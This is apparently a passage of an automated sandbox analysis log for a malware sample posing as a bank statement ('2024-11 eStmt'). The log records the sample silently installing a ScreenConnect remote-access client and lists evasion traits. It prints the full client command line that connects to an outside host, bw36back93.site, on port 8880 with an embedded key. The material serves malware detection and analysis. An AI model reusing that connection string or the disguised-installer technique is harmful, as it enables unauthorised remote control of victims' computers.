                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 15A0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 5C30000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 6C30000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 6D60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 7D60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 6C30000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 7FB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 8FB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: 6C30000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeMemory allocated: 16C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeMemory allocated: 1DF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeMemory allocated: 3DF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeMemory allocated: 1B1C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeMemory allocated: BB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeMemory allocated: 1A580000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4E28.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56A4.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI586B.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exe TID: 7708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe TID: 8116Thread sleep count: 43 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe TID: 7392Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2987604310.0000000005420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.0.2024-11 eStmt 5563019.exe.acccf8.2.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.2.2024-11 eStmt 5563019.exe.5580000.1.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                              Source: 0.0.2024-11 eStmt 5563019.exe.647fd8.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.0.2024-11 eStmt 5563019.exe.647fd8.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.0.2024-11 eStmt 5563019.exe.647fd8.3.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.0.2024-11 eStmt 5563019.exe.647fd8.3.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\d519fd2fdcfe66e7\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (d519fd2fdcfe66e7)\screenconnect.clientservice.exe" "?e=access&y=guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=bgiaaackaabsu0exaagaaaeaaqbvrcwst%2b2ckthnas8wcpzwbkw7gylkqj6rdxijhv%2frvikga3ohvbuuk74ex5u2wdvyglxxustahste3rks8zw%2f5nmdmdz%2ffz%2fdadwqnva27wrdtbgeukyvimg%2bruqteybssalskc71pj4gqnardbnyswnxqnucohb8xkd6muqapufc4dxf0e7ewf1onytp%2bzz6ui1%2fvm3p0mitphdooydpjyjmnfl6as3%2bei4fxjkhopddjsishdmobgrn%2bwsllvtqzcpiqelo7sxadykptz0t1jf7brkqg2z6vshgz%2fal71%2ffvdi1kgsl2h5jlymzgmq6ew%2fozhqcdp4oy8sdbmw0&c=sv&c=11-11%20newp&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1761037856.0000000000EB2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1761037856.0000000000EB2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3431C2 CreateNamedPipeW,8_2_00007FFD9B3431C2
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_016C4D68 RtlGetVersion,7_2_016C4D68
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: Yara matchFile source: 2024-11 eStmt 5563019.exe, type: SAMPLE
                              Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.323f880.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.eb0000.0.unpack, type: UNPACKEDPE
